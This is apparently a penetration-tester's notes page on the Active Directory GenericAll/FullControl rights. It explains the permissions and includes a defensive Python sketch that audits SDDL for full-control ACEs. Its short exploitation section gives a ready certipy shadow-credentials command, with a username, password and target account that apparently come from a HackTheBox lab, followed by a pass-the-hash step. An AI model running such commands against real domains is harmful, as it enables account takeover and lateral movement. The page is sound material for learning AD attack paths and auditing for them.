FullControl
Information
GenericAll vs. FullControl
GenericAll is a specific Active Directory right that grants full control over an object. This includes the ability to read, write, modify, and delete the object and its properties. This is the right typically needed to fully control an AD object.
FullControl is a broader Windows permission concept. When we see it in tools or GUIs (like File Explorer or ACL editors), it usually maps to GenericAll for AD objects, but can include some additional flags related to inheritance and specific extended rights.
Full Control typically refers to the highest level of permissions granted on an object in AD. It allows the user or group to perform all actions on the object, including creating, deleting, modifying, and changing permissions.
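To audit for this right, the sketch below (an added example, not part of the original notes) decodes the DACL of an object from its SDDL string and reports allow ACEs whose mask covers everything GenericAll maps to on a directory object (0xF01FF), together with their inheritance flags. The function names, the trusted set and the sample SDDL with its SIDs are constructed for illustration.

```python
import re

# Directory-object access-mask bits keyed by their SDDL right codes.
SDDL_RIGHTS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
}
GENERIC_ALL_BIT = 0x10000000  # SDDL "GA", the unmapped generic bit
AD_FULL_CONTROL = 0x000F01FF  # GenericAll after mapping onto an AD object

def rights_to_mask(rights):
    """Convert an SDDL rights field (two-letter codes or 0x hex) to a mask."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
    else:
        mask = 0
        for code in re.findall("..", rights):
            # Codes outside the table (GR, GW, GX) are ignored in this sketch.
            mask |= GENERIC_ALL_BIT if code == "GA" else SDDL_RIGHTS.get(code, 0)
    if mask & GENERIC_ALL_BIT:  # apply the generic mapping
        mask = (mask & ~GENERIC_ALL_BIT) | AD_FULL_CONTROL
    return mask

def full_control_aces(sddl, trusted):
    """List (trustee, inheritance flags) for full-control ACEs outside `trusted`."""
    hits = []
    for ace in re.findall(r"\(([^)]*)\)", sddl):
        fields = (ace.split(";") + [""] * 6)[:6]
        ace_type, flags, rights, object_guid, _inherit_guid, trustee = fields
        # Only allow ACEs on the whole object; SACL audit ACEs have type AU.
        if ace_type not in ("A", "OA") or object_guid:
            continue
        mask = rights_to_mask(rights)
        if (mask & AD_FULL_CONTROL) == AD_FULL_CONTROL and trustee not in trusted:
            hits.append((trustee, re.findall("..", flags)))
    return hits

# Constructed sample: the SIDs and the trusted set below are made up.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(A;;GA;;;SY)"
    "(A;CI;0xf01ff;;;S-1-5-21-1111111111-2222222222-3333333333-1104)"
    "(A;;RPWP;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "S:(AU;SA;GA;;;WD)"
)

if __name__ == "__main__":
    print(full_control_aces(SAMPLE_SDDL, {"DA", "SY"}))
```

The three spellings of the same grant (GA, the expanded code string, and the hex mask) all decode to 0xF01FF, so only the trustee and the inheritance flags distinguish the entries.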
Exploitation
Password Change
Check how here.
Shadow Credential
Get the object's hash and perform a PtH attack.
certipy shadow auto -username oorend@rebound.htb -password '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb